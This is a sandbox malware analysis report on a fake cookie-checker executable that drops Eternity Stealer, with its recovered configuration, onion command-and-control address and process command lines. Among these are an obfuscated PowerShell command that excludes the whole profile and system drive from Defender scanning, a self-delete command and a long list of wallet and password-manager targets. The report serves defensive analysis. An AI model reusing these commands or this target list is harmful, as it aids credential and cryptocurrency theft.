File name: bltool 2.7..2.exe
Full analysis: https://app.any.run/tasks/3eb4ef5e-22da-4b3d-a768-540584daddf1
Verdict: Malicious activity
Analysis date: January 16, 2024, 22:01:56
OS: Windows 7 Professional Service Pack 1 (build: 7601, 32 bit)
Tags: evasion, eternity, eternity stealer
Indicators:
MIME: application/x-dosexec
File info: PE32 executable (GUI) Intel 80386 (stripped to external PDB), for MS Windows
MD5: E1C3BAD47838C6EE4D8696854A5A09A0
SHA1: 06A48674F78B840CBA9F8E8742B96A274C996F14
SHA256: ACC7B7E5B7A0C5E146CF6BC2A21BE958D89978798AFC479E76DF6CF39857547A
SSDEEP: 98304:zR3PqdEHoSBAzt2Qku5xAoZNbgyx3kMDhglOnoZpiLJiy+mkOHt2WqWzwBdrujpm:MlEjoC

ANY.RUN is an interactive service which provides full access to the guest system. Information in this report could be distorted by user actions and is provided for user acknowledgement as it is. ANY.RUN does not guarantee maliciousness or safety of the content.
  • MALICIOUS

    • Drops the executable file immediately after the start

      • bltool 2.7..2.exe (PID: 2256)
    • Steals credentials from Web Browsers

      • babu.exe (PID: 668)
    • Actions look like stealing of personal data

      • babu.exe (PID: 668)
    • Starts CMD.EXE for self-deleting

      • babu.exe (PID: 668)
    • ETERNITY has been detected (YARA)

      • babu.exe (PID: 668)
  • SUSPICIOUS

    • Reads the Internet Settings

      • bltool 2.7..2.exe (PID: 2256)
      • powershell.exe (PID: 2016)
      • babu.exe (PID: 668)
    • Executable content was dropped or overwritten

      • bltool 2.7..2.exe (PID: 2256)
    • Base64-obfuscated command line is found

      • bltool 2.7..2.exe (PID: 2256)
    • BASE64 encoded PowerShell command has been detected

      • bltool 2.7..2.exe (PID: 2256)
    • Starts POWERSHELL.EXE for commands execution

      • bltool 2.7..2.exe (PID: 2256)
    • Starts CMD.EXE for commands execution

      • babu.exe (PID: 668)
    • Accesses Microsoft Outlook profiles

      • babu.exe (PID: 668)
    • Using 'findstr.exe' to search for text patterns in files and output

      • cmd.exe (PID: 1928)
    • Starts application with an unusual extension

      • cmd.exe (PID: 1928)
      • cmd.exe (PID: 1232)
    • Uses NETSH.EXE to obtain data on the network

      • cmd.exe (PID: 1928)
    • Reads browser cookies

      • babu.exe (PID: 668)
    • Using PowerShell to operate with local accounts

      • powershell.exe (PID: 2016)
    • Reads settings of System Certificates

      • babu.exe (PID: 668)
    • Checks for external IP

      • babu.exe (PID: 668)
    • Connects to unusual port

      • babu.exe (PID: 668)
    • Process communicates with Telegram (possibly using it as an attacker's C2 server; here the strings show t.me/tor_proxies being read for proxy addresses, while the C2 itself is the .onion address in the configuration)

      • babu.exe (PID: 668)
  • INFO

    • Reads the computer name

      • bltool 2.7..2.exe (PID: 2256)
      • babu.exe (PID: 668)
      • z.exe (PID: 1608)
    • Checks supported languages

      • bltool 2.7..2.exe (PID: 2256)
      • babu.exe (PID: 668)
      • z.exe (PID: 1608)
      • chcp.com (PID: 2480)
      • chcp.com (PID: 148)
    • Reads the machine GUID from the registry

      • z.exe (PID: 1608)
      • babu.exe (PID: 668)
    • Reads Environment values

      • babu.exe (PID: 668)
    • Creates files in a temporary directory

      • bltool 2.7..2.exe (PID: 2256)
    • Reads CPU info

      • babu.exe (PID: 668)

Eternity

(PID) Process: (668) babu.exe
C2: http://izrukvro5khcol3z7cvvdq3akeunlod2gshgn7ppo3a4jvse3z5hpiyd.onion
Strings (592): the dump below is the configuration recovered from the running process. Read together, the strings describe the build: report sections (System, Gaming, FTP, VPN, Browsers, Messengers, Wallets, PasswordManagers, Grabber), a grabber keyword and extension list, a regex for 64-hex-digit or WIF-style Base58 private keys, per-application file paths and browser-extension IDs for wallets, authenticators and password managers, an ip-api.com geolocation lookup, and the delivery path: proxy addresses are read from the t.me/tor_proxies channel page with the tgme_page_description regex, a Tor client can be fetched from github.com/L1ghtM4n/TorProxy, the report is uploaded to the .onion address through a SOCKS5 proxy, with https://pastebin.com/raw/ and a clearnet gateway as fallbacks. The "[Network] ..." lines are the stealer's own log messages; the SOCKS5 error strings are listed in RFC 1928 reply-code order.
cmd.exe
YFIif*P0Y:W%_Fut%X8Q;Y4V;X*`#I^#YI5 %VYF:8*YDI(-5"
SOFTWARE
uk
Glory to Ukraine!
<div class="tgme_page_description" dir="auto">(.*)</div>
null
null
null
abpmfheqvu
ceozvxhivb
aikvbh
[Network] Report sent!
https://t.me/tor_proxies
Telesoft
8BwXuDdu03PASQcGYHQqwCLEQI4o79JzwLnU21H2WaE
{0URZBm
78b53edfb47843f58692c0a8d131dcfd
scan electrum metamask wallet phrase recover secret security code seed nft backup coin key pass .txt .doc .kdbx .rdp .pdf .loli .lolix .anom .cs .cpp .csproj
DropBox
OneDrive
cmd.exe
/C chcp 65001 &&
SELECT ExecutablePath, ProcessID FROM Win32_Process
ProcessID
ExecutablePath
SELECT CommandLine FROM Win32_Process WHERE ProcessId =
CommandLine
Username: {0} Password: {1}
http
.
:
br" = "{1v>3Gm"il [ o]6 )HMo|-'XF08h
Software:
Hostname:
{0} Username: {1} Password: {2}
Software:
Hostname:
+krcFFPGQQy
Country: {0}
City: {0}
Information.txt
System
Gaming
FTP
VPN
Browsers
Messengers
Wallets
PasswordManagers
Grabber
SOFTWARE
TONWallet
data
tonlib_log.txt
db
db
Wallets
TonWallet\
lib
lib
Wallets
TonWallet\
salt
Wallets
TonWallet
salt
JaxxClassic
com.liberty.jaxx
IndexedDB
file__0.indexeddb.leveldb
JaxxLiberty
Jaxx
Local Storage
leveldb
*.l??
Wallets
atomic
Local Storage
leveldb
*.l??
Wallets
Atomic
Local Storage
leveldb
SOFTWARE\Bitcoin\Bitcoin-Qt
strDataDir
*wallet*dat
Wallets
BitcoinCore
Coinomi
Coinomi
wallets
*.wallet
Wallets
Coinomi
SOFTWARE\Dash\Dash-Qt
strDataDir
*wallet*dat
Wallets
DashcoinCore
SOFTWARE\Dogecoin\Dogecoin-Qt
strDataDir
*wallet*dat
Wallets
DogecoinCore
*Electr*
config
recently_open
Wallets
Exodus
exodus.wallet
exodus.conf.json
*.seco
Wallets
Exodus
exodus.wallet
Wallets
Exodus
Guarda
Local Storage
leveldb
*.l??
Wallets
Guarda
Local Storage
leveldb
strDataDir
*wallet*dat
Wallets
LitecoinCore
SOFTWARE\monero-project\monero-core
wallet_path
\..
*.*
Wallets
MoneroCore
WalletWasabi
Client
Wallets
*.json
Wallets
Wasabi
Zcash
*wallet*dat
Wallets
Zcash
AzireVPN
token.txt
Unable to decrypt credential
NordVPN
*.rfo
PasswordManagers
RoboForm
RoboForm
Profiles
*.conf
PasswordManagers
NordPass
NordPass
data*.json
PasswordManagers
BitWarden
Bitwarden
LastDatabases=(.*?)\n
,
PasswordManagers
KeePassXC
ConnectionInfo
Path
..\..\
PasswordManagers
KeePass2
databases
KeyFilePath
..\..\
PasswordManagers
KeePass2
keys
KeePass
KeePass.config.xml
KeePassXC
keepassxc.ini
*.sqlite
PasswordManagers
1Password
data
1Password
data
config.json
Partitions
Messengers
Rambox
config.json
Cookies
Messengers
Rambox
Cookies
Local Storage\leveldb
*.l??
Messengers
Rambox
Partitions
Local Storage
leveldb
Rambox
*.db
Messengers
Viber
ViberPC
leveldb
Local State
os_crypt
encrypted_key
key.dat
[Discord] Discord decryption failed, {0}
*.l??
tokens.dat
dQw4w9WgXcQ:([^.*\['(.*)'\].*$][^"]*)
Discord
Discord PTB
Discord Canary
.purple
config.json
sql
db.sqlite
Messengers
Signal
config.json
Messengers
Signal
sql
db.sqlite
Signal
Telegram
tdata
Software\Classes\tdesktop.tg\DefaultIcons1
"
tdata
Telegram Desktop
tdata
*s
Messengers
Telegram
map?
Telegram
*.l??
Messengers
WhatsApp
Local Storage
leveldb
WhatsApp
Local Storage
leveldb
Mozilla\Firefox
8pecxstudios\Cyberfox
Comodo\IceDragon
K-Meleon
Moonchild Productions\Pale Moon
key3.db
logins.json
cookies.sqlite
Local State
os_crypt
encrypted_key
Failed decrypt {0} masterkey, {1}
360Browser\Browser
360Chrome\Browser
AVAST Software\Browser
7Star\7Star
Amigo\User
BraveSoftware\Brave-Browser
CatalinaGroup\Citrio
CentBrowser
BlackHawk
Chedot
Blisk
GhostBrowser
Chromodo
CocCoc\Browser
Comodo
Comodo\Dragon
Coowon\Coowon
CatalinaGroup\Citrio
Elements Browser
Epic Privacy Browser
Fenrir Inc\Sleipnir5\setting\modules\ChromiumViewer
Google(x86)\Chrome
Google\Chrome
Google\Chrome SxS
Google\Chrome Beta
liebao\User Data
Kinza
Iridium
K-Melon
Kometa
Mail.Ru\Atom
MapleStudio\ChromePlus
Maxthon3
Microsoft\Edge
Nichrome
Opera Software\Opera GX Stable
Opera Software\Opera Stable
Orbitum
QIP Surf
Sputnik\Sputnik
Torch
Uran
Vivaldi
Yandex\YandexBrowser
liebao
uCozMedia\Uran
SalamWeb
Chromium
UCBrowser
Xpom
Xvast
SuperBird
Tencent\QQBrowser
Login Data
Cookies
Network\Cookies
Web Data
Authy
gaedmjdfmmahhbjefcbgaolhhanlaolb
Authenticator
bhghoamapcdpbohphigoooaddinpkbai
SSO Authenticator
nhhldecdfagpbfggphklkaeiocfnaafm
EOS Authenticator
oeljdldpnmdbchonielidgobddffflal
GAuth Authenticator
ilgcnhelpchnceeipipijaljkblbcobl
Bitwarden
nngceckbapebfimnlniiiahkandclblb
KeePassXC
oboonakemofpalcgghocfoadofidjkkk
Dashlane
fdjamakpfbbddfjaooikfcpapjohcfmg
1Password
aeblfdkhhhdcdjpifhhbdiojplfjncoa
NordPass
fooolghllnmhmmndgjiamiiodkpenpbb
Keeper
bfogiafebfohielmmehodmfbbebbbpei
RoboForm
pnlccmojcmeohlpggmfnbbiapkmbliob
LastPass
hdokiejnpimakedhajhdlcegeplioahd
BrowserPass
naepdomgkenhinolocfifgehidddafch
MYKI
bmikpgodpkclnkgmnpphehdgcimmided
Splikity
jhfjfclepacoldmjmkmdlmganfaalklb
CommonKey
chgfefjpcobfbnpmiokfjjaglahmnded
Zoho Vault
igkpcodhieompeloncfnbekccinhapdb
Norton Password Manager
admmjipmmciaobhojoghlmleefbicajg
Avira Password Manager
caljgklbbfbcjjanaijlacgncafpegll
Trezor Password Manager
imloifkgjagghnncjkhggdhalmcnfklk
Phantom
bfnaelmomeimhlpmgjnjophhpkkoljpa
MetaMask
nkbihfbeogaeaoehlefnkodbefgpgknn
TronLink
ibnejdfjmmkpcnlpebklmnkoeoihofec
BinanceChain
fhbohimaelbohpjbbldcngcnapndodjp
Coin98
aeachknmefphepccionboohckonoeemg
iWallet
kncchdigobghenbbaddojjnnaogfppfj
Wombat
amkmjjmmflddogmhpjloimipbofnfjih
MEW CX
NeoLine
cphhlgmgameodnhkjdmkpanlelnlohao
Terra Station
aiifbnbfobpmeekipheeijimdpnlpgpp
Keplr
dmkamcknogkgcdfhhbddcghachkejeap
Sollet
fhmfendgdocmcbmfikdcogofphimnkno
flpiciilemghbmfalicajoolhkkenfel
KHC
hcflpincpppdclinealmandijcmnkbgn
TezBox
mnfifefkajgofkcjkemidiaecocnkjeh
Solflare
bhhhlbepdkbapadjdnnojkbgioiodbic
Byone
nlgbhdfgdhgbiamfdfmbikcdghidoadd
OneKey
infeboajgfhgbjpjbeppbkgnabfdkdaf
DAppPlay
lodccjjbdhfakaekdiahmedfbieldgik
BitClip
ijmpgkjfkbfhoebgogflfebnmejmfbml
Steem Keychain
lkcjlnjfpbikmcmbachjpdbijejflpcm
Nash Extension
onofpnbbkehpmmoabgpcpmigafmmnjhl
Hycon Lite Client
bcopgchhojmggmffilplmbdicgaihlkp
ZilPay
klnaejjgbibmhlephnhpmaofohgkpgkd
Leaf Wallet
cihmoadaighcejopammfbmddcmdekcje
Cyano Wallet
dkdedlpgdmmkkfjabffeganieamfklkm
Cyano Wallet Pro
icmkfkmjoklfhlfdkkkgpnpldkgdmhoe
Nabox Wallet
nknhiehlklippafakaeklbeglecifhad
Polymesh Wallet
jojhfeoedkpkglbfimdfabpdfjaoolaf
Nifty Wallet
jbdaocneiiinmjbjlgalhcelgbejmnid
Liquality Wallet
kpfopkelmapcoipemfendmdcghnegimn
Math Wallet
afbcbjpbpfadlkmhmclhkeeodmamcflc
Coinbase Wallet
hnfanknocfeofbddgcijnmhnfnkdnaad
Clover Wallet
nhnkbkgjikgcigadomkphalanndcapjk
Yoroi
ffnbelfdoeiohenkjibnmadjiehjhajb
Guarda
hpglfhgfnhbgpjdenjgmdgoeiappafln
EQUAL Wallet
blnieiiffboillknjnepogjhkgnoapac
BitApp Wallet
fihkakfobkmkjojpchpfgcmhfjnmnfpi
Auro Wallet
cnmamaachppnkjgnildpdmkaakejnhae
Saturn Wallet
nkddgncdjgjfcddamfgcmfnlhccnimig
Ronin Wallet
fnjhmkhhmkbjkkabndcnnogagogbneec
Bad response received from proxy server.
None of the authentication method was accepted by proxy server.
Operation completed successfully.
General SOCKS server failure.
Connection not allowed by ruleset.
Network unreachable.
Host unreachable.
Connection refused.
TTL expired.
Command not supported.
Address type not supported.
Unknown error.
https://pastebin.com/raw/
[Network] Proxy download failed, {0}
ghdc< HTTP/1.1 Host: {1-tHICRIC kRIPCO< Expect: 100-continue Connection: Keep-Alive
[Network] Tor upload failed over node {0}:{1}, message: {2}
xbz\'
Qk +
&i={0}
&co={0}
&ci={0}
&t={0}
.onion
[Network] Using public tor proxy {0}
[Network] All proxies offline... Using second reporting method.
127.0.0.1
[Network] Reporting to clearnet gateway
[Network] {0}
Bootstrapped 100
Tor
Tor.exe
https://github.com/L1ghtM4n/TorProxy/blob/main/LIB/Tor.zip?raw=true
x
SELECT Name FROM Win32_Processor
root\CIMV2
Name
Unknown CPU
SELECT Name FROM Win32_VideoController
root\CIMV2
Name
Unknown GPU
SELECT Size FROM Win32_LogicalDisk WHERE DriveType = 3
root\CIMV2
Size
Select TotalPhysicalMemory From Win32_ComputerSystem
TotalPhysicalMemory
Select Manufacturer from Win32_ComputerSystem
Manufacturer
Unknown manufacturer
Select Model from Win32_ComputerSystem
Model
Unknown model
- Eternity Stealer -
DIMPB"SLHG"\
Stub Version: {0}
Stub Location: {0}
System:
y:uyX[yI&46 {+)
User
Admin
42dUG^hZN_a
aqD`E n);0H
UILang: {0}
Hardware:
'h]xEJ@H! F
GPUName: {0}
RAMAmount: {0}Gb
j o3e6D;4Gb
=n]u]0,G
Manufacturer: {0}
a[jCPN9JOII4^
Geolocation: {0}
http://ip-api.com/json
query
e;)
country
countryCode
city
Unknown System
SELECT Name FROM Win32_OperatingSystem
root\CIMV2
Name
HARDWARE\Description\System\CentralProcessor\0
Identifier
x86
{0} ({1} bit)
Unknown
:
-
DRIVE
Grabber
.txt
Grabber
Important
uL*g +K=b=&y-qIV&y/%4mY$_n hbPJT"$)
([a-fA-F0-9]{64}|5[HJK][1-9A-Za-z][^OIl]{48,50}$|[5KL][1-9A-HJ-NP-Za-km-z]{50,51})
USERPROFILE
Downloads
Stream cannot seek
Writing is not alowed
Writing is not alowed
Writing is not allowed
Central directory currently does not exist
Stream cannot be written
false
true
\\
\"
\n
\r
\t
\b
\f
\u
X4
false
true
true
null
JSON Parse: Too many closing brackets
JSON Parse: Quotation marks seems to be messed up.
:
false
true
0
eternity
algorithm
Algorithm cannot be null.
salt
Salt cannot be null.
password
Password cannot be null.
Derived key too long.
No Malware configuration.

TRiD

.exe | Win64 Executable (generic) (61.6)
.dll | Win32 Dynamic Link Library (generic) (14.6)
.exe | Win32 Executable (generic) (10)
.exe | Win16/32 Executable Delphi generic (4.6)
.exe | Generic Win/DOS Executable (4.4)

EXIF

EXE

MachineType: Intel 386 or later, and compatibles
TimeStamp: 0000:00:00 00:00:00
ImageFileCharacteristics: No relocs, Executable, No line numbers, No symbols, 32-bit, No debug
PEType: PE32
LinkerVersion: 6
CodeSize: 2048
InitializedDataSize: 3968512
UninitializedDataSize: -
EntryPoint: 0x14d1
OSVersion: 4
ImageVersion: -
SubsystemVersion: 4
Subsystem: Windows GUI
FileVersionNumber: 2.7.2.0
ProductVersionNumber: 2.7.2.0
FileFlagsMask: 0x0000
FileFlags: (none)
FileOS: Unknown (0)
ObjectFileType: Unknown
FileSubtype: -
LanguageCode: English (U.S.)
CharacterSet: Unicode
CompanyName: -
FileTitle: WPF_login.exe
FileDescription: BLTools Cookies Checker
FileVersion: 2,7,2,0
LegalCopyright: Copyright © 2023
LegalTrademark: -
ProductName: BLTools Cookies Checker
ProductVersion: 2,7,2,0
Total processes: 53
Monitored processes: 12
Malicious processes: 2
Suspicious processes: 0

Behavior graph

start
  bltool 2.7..2.exe (PID 128, MEDIUM integrity, parent explorer.exe, no specs)
  bltool 2.7..2.exe (PID 2256, HIGH integrity, parent explorer.exe)
    powershell.exe (PID 2016, -EncodedCommand, no specs)
    babu.exe (PID 668, #ETERNITY)
      cmd.exe (PID 1928, no specs)
        chcp.com (no specs)
        netsh.exe (PID 2340, no specs)
        findstr.exe (PID 2448, no specs)
      cmd.exe (PID 1232, no specs)
        chcp.com (no specs)
        ping.exe (no specs)
    z.exe (PID 1608)
The two chcp.com instances are PID 148 and PID 2480; the page does not say which cmd.exe each belongs to.

Process information

PID
CMD
Path
Indicators
Parent process
PID: 128
CMD: "C:\Users\admin\AppData\Local\Temp\bltool 2.7..2.exe"
Path: C:\Users\admin\AppData\Local\Temp\bltool 2.7..2.exe
Parent process: explorer.exe
User:
admin
Integrity Level:
MEDIUM
Description:
BLTools Cookies Checker
Exit code:
3221226540 (0xC000042C, STATUS_ELEVATION_REQUIRED: this MEDIUM-integrity launch did not get past the elevation check; the same image runs again as PID 2256 at HIGH integrity)
Version:
2,7,2,0
Modules
Images
c:\users\admin\appdata\local\temp\bltool 2.7..2.exe
c:\windows\system32\ntdll.dll
PID: 148
CMD: chcp 65001
Path: C:\Windows\System32\chcp.com
Parent process: cmd.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
HIGH
Description:
Change CodePage Utility
Exit code:
0
Version:
6.1.7600.16385 (win7_rtm.090713-1255)
Modules
Images
c:\windows\system32\chcp.com
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\ulib.dll
c:\windows\system32\user32.dll
c:\windows\system32\gdi32.dll
c:\windows\system32\lpk.dll
c:\windows\system32\usp10.dll
PID: 668
CMD: "C:\Users\admin\AppData\Local\Temp\babu.exe"
Path: C:\Users\admin\AppData\Local\Temp\babu.exe
Parent process: bltool 2.7..2.exe
User:
admin
Company:
asdf234asdf
Integrity Level:
HIGH
Description:
asdsdfw3423
Exit code:
0
Version:
234.234.4322.1234
Modules
Images
c:\users\admin\appdata\local\temp\babu.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\mscoree.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
c:\windows\microsoft.net\framework\v4.0.30319\mscoreei.dll
PID: 1232
CMD: "C:\Windows\System32\cmd.exe" /C chcp 65001 && ping 127.0.0.1 && DEL /F /S /Q /A "C:\Users\admin\AppData\Local\Temp\babu.exe"
Path: C:\Windows\System32\cmd.exe
Parent process: babu.exe
The ping to 127.0.0.1 is a delay so that babu.exe has exited before DEL runs against its own image; this is the "Starts CMD.EXE for self-deleting" indicator.
User:
admin
Company:
Microsoft Corporation
Integrity Level:
HIGH
Description:
Windows Command Processor
Exit code:
0
Version:
6.1.7601.17514 (win7sp1_rtm.101119-1850)
Modules
Images
c:\windows\system32\cmd.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\winbrand.dll
c:\windows\system32\user32.dll
c:\windows\system32\gdi32.dll
c:\windows\system32\lpk.dll
c:\windows\system32\usp10.dll
PID: 1608
CMD: "C:\Users\admin\AppData\Local\Temp\z.exe"
Path: C:\Users\admin\AppData\Local\Temp\z.exe
Parent process: bltool 2.7..2.exe
User:
admin
Integrity Level:
HIGH
Description:
BLTools Cookies Checker
Exit code:
3762504530 (0xE0434352, the CLR's unhandled managed exception code; z.exe loads mscoree.dll, so it terminated on an unhandled .NET exception rather than completing)
Version:
2.7.2.0
Modules
Images
c:\users\admin\appdata\local\temp\z.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\mscoree.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
c:\windows\microsoft.net\framework\v4.0.30319\mscoreei.dll
PID: 1928
CMD: "cmd.exe" /C chcp 65001 && netsh wlan show profile | findstr All
Path: C:\Windows\System32\cmd.exe
Parent process: babu.exe
This lists the saved Wi-Fi profile names (the "All User Profile" lines of netsh output). netsh.exe (PID 2340) and findstr.exe (PID 2448) both exit with 1: no profile lines were produced on the guest, so nothing was harvested here.
User:
admin
Company:
Microsoft Corporation
Integrity Level:
HIGH
Description:
Windows Command Processor
Exit code:
1
Version:
6.1.7601.17514 (win7sp1_rtm.101119-1850)
Modules
Images
c:\windows\system32\cmd.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\winbrand.dll
c:\windows\system32\user32.dll
c:\windows\system32\gdi32.dll
c:\windows\system32\lpk.dll
c:\windows\system32\usp10.dll
PID: 2016
CMD: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAG4AagBkACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHcAcQBrACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHgAZgBlACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAHMAegBhACMAPgA="
Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Parent process: bltool 2.7..2.exe
Decoded -EncodedCommand (base64 of UTF-16LE): <#njd#>Add-MpPreference <#wqk#> -ExclusionPath @($env:UserProfile,$env:SystemDrive) <#xfe#> -Force <#sza#>
The <#...#> block comments are junk inserted to break simple string matching; with them removed the command is Add-MpPreference -ExclusionPath @($env:UserProfile,$env:SystemDrive) -Force, which asks Microsoft Defender to stop scanning the whole user profile and the system drive. The cmdlet ships with the built-in Defender on Windows 10 and later and does not exist on the Windows 7 guest, which fits the exit code 1 below.
User:
admin
Company:
Microsoft Corporation
Integrity Level:
HIGH
Description:
Windows PowerShell
Exit code:
1
Version:
10.0.14409.1005 (rs1_srvoob.161208-1155)
Modules
Images
c:\windows\system32\windowspowershell\v1.0\powershell.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\atl.dll
c:\windows\system32\user32.dll
PID: 2256
CMD: "C:\Users\admin\AppData\Local\Temp\bltool 2.7..2.exe"
Path: C:\Users\admin\AppData\Local\Temp\bltool 2.7..2.exe
Parent process: explorer.exe
User:
admin
Integrity Level:
HIGH
Description:
BLTools Cookies Checker
Exit code:
0
Version:
2,7,2,0
Modules
Images
c:\users\admin\appdata\local\temp\bltool 2.7..2.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\shell32.dll
c:\windows\system32\shlwapi.dll
c:\windows\system32\gdi32.dll
c:\windows\system32\user32.dll
c:\windows\system32\lpk.dll
PID: 2340
CMD: netsh wlan show profile
Path: C:\Windows\System32\netsh.exe
Parent process: cmd.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
HIGH
Description:
Network Command Shell
Exit code:
1
Version:
6.1.7600.16385 (win7_rtm.090713-1255)
Modules
Images
c:\windows\system32\netsh.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\credui.dll
c:\windows\system32\user32.dll
PID: 2448
CMD: findstr All
Path: C:\Windows\System32\findstr.exe
Parent process: cmd.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
HIGH
Description:
Find String (QGREP) Utility
Exit code:
1
Version:
6.1.7600.16385 (win7_rtm.090713-1255)
Modules
Images
c:\windows\system32\findstr.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\user32.dll
c:\windows\system32\gdi32.dll
c:\windows\system32\lpk.dll
c:\windows\system32\usp10.dll
c:\windows\system32\imm32.dll
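As an added example (not code from the report or from ANY.RUN), the Python below reproduces the triage an analyst would run over the command lines in the process table above: it decodes the -EncodedCommand argument (base64 of UTF-16LE), strips the <# ... #> padding comments, and flags the three behaviours that matter in this tree: the Defender exclusion, the Wi-Fi profile enumeration and the ping-then-DEL self-delete. The event list is transcribed from the table and the encoded string is the one from PID 2016; the field names (pid, parent, cmd) and the tag names are this example's own.

```python
"""Triage of the process command lines listed in this report (added example)."""
import base64
import re

# The -EncodedCommand argument copied verbatim from PID 2016's entry above.
ENCODED = "PAAjAG4AagBkACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHcAcQBrACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHgAZgBlACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAHMAegBhACMAPgA="

# Process events transcribed from the process table: pid, parent image, command line.
EVENTS = [
    {"pid": 2016, "parent": "bltool 2.7..2.exe",
     "cmd": 'powershell.exe -EncodedCommand "' + ENCODED + '"'},
    {"pid": 1928, "parent": "babu.exe",
     "cmd": '"cmd.exe" /C chcp 65001 && netsh wlan show profile | findstr All'},
    {"pid": 1232, "parent": "babu.exe",
     "cmd": '"C:\\Windows\\System32\\cmd.exe" /C chcp 65001 && ping 127.0.0.1 '
            '&& DEL /F /S /Q /A "C:\\Users\\admin\\AppData\\Local\\Temp\\babu.exe"'},
    {"pid": 148, "parent": "cmd.exe", "cmd": "chcp 65001"},
]

# powershell.exe accepts -e, -ec, -enc and -EncodedCommand, case-insensitively.
ENC_ARG = re.compile(r'-(?:encodedcommand|enc|ec|e)\s+"?([A-Za-z0-9+/=]+)', re.I)


def decode_encoded_command(cmdline):
    """Return the script behind -EncodedCommand (base64 of UTF-16LE), or None."""
    m = ENC_ARG.search(cmdline)
    if not m:
        return None
    return base64.b64decode(m.group(1)).decode("utf-16-le")


def strip_block_comments(script):
    """Drop <# ... #> block comments (used here as junk padding) and collapse spaces."""
    return " ".join(re.sub(r"<#.*?#>", " ", script, flags=re.S).split())


def triage(event):
    """Return (tag, detail) findings for one process event."""
    findings = []
    cmd = event["cmd"]
    low = cmd.lower()

    script = decode_encoded_command(cmd)
    if script is not None:
        clean = strip_block_comments(script)
        findings.append(("encoded_powershell", clean))
        # Excluding the whole profile and system drive from Defender is evasion, not admin work.
        if "add-mppreference" in clean.lower() and "-exclusionpath" in clean.lower():
            findings.append(("defender_exclusion", clean))

    # Saved Wi-Fi profile enumeration; "findstr All" keeps the "All User Profile" lines.
    if "netsh" in low and "wlan show profile" in low:
        findings.append(("wifi_profile_enum", cmd))

    # Self-delete pattern: ping to loopback as a sleep, then DEL of the parent's own image.
    if re.search(r"ping\s+127\.0\.0\.1.*&&\s*del\b", low):
        m = re.search(r'del\s+(?:/\w\s+)*"?([^"]+\.exe)"?', cmd, re.I)
        target = m.group(1).rsplit("\\", 1)[-1] if m else ""
        if target.lower() == event["parent"].lower():
            findings.append(("self_delete", target))
    return findings


def triage_all(events=EVENTS):
    """Map each PID to the tags raised for it (an empty list means nothing flagged)."""
    return {e["pid"]: [tag for tag, _ in triage(e)] for e in events}


if __name__ == "__main__":
    for pid, tags in triage_all().items():
        print(pid, tags or "-")
```

The self-delete rule deliberately requires the DEL target to be the parent's own image name; a cmd.exe that pings and deletes some other file is ordinary cleanup, and tying the rule to the parent keeps it quiet on installers.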
Total events: 5 504
Read events: 5 404
Write events: 100
Delete events: 0

Modification events

PID 2256 bltool 2.7..2.exe | write | HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap | ProxyBypass = 1
PID 2256 bltool 2.7..2.exe | write | HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap | IntranetName = 1
PID 2256 bltool 2.7..2.exe | write | HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap | UNCAsIntranet = 1
PID 2256 bltool 2.7..2.exe | write | HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap | AutoDetect = 0
PID 2016 powershell.exe | write | HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap | ProxyBypass = 1
